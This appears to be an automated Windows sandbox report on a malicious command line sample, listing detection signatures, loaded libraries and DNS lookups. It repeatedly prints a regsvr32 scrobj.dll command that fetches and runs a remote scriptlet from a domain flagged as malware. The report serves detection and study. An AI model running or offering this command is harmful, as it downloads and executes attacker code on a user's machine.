Windows Analysis Report

Overview

General Information

Analysis ID: 1565425
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Sigma detected: Execute Scriptlet from internet Via Regsvr32
Creates a process in suspended mode (likely to inject code)
Registers a DLL
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://server1.aserdefa.ru/deploy.xml Avira URL Cloud: Label: malware
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: server1.aserdefa.ru replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: server1.aserdefa.ru
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://server1.aserdefa.ru/
Source: regsvr32.exe, 00000002.00000002.1666837180.00000000004C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://server1.aserdefa.ru/deploy.xml
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://server1.aserdefa.ru/deploy.xml4
Source: regsvr32.exe, 00000002.00000002.1666802080.0000000000490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://server1.aserdefa.ru/deploy.xmlscrobj.dll5
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://server1.aserdefa.ru/deploy.xmly
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: classification engine Classification label: mal56.evad.win@4/0@1/0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Registers a DLL
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
Source: regsvr32.exe, 00000002.00000002.1666837180.0000000000506000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565425 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 29/11/2024 Architecture: WINDOWS Score: 56 13 server1.aserdefa.ru 2->13 15 Antivirus detection for URL or domain 2->15 17 Sigma detected: Execute Scriptlet from internet Via Regsvr32 2->17 7 cmd.exe 1 2->7         started        signatures3 process4 process5 9 regsvr32.exe 12 7->9         started        11 conhost.exe 7->11         started       
No contacted IP infos

Contacted Domains

Name IP Active
server1.aserdefa.ru unknown unknown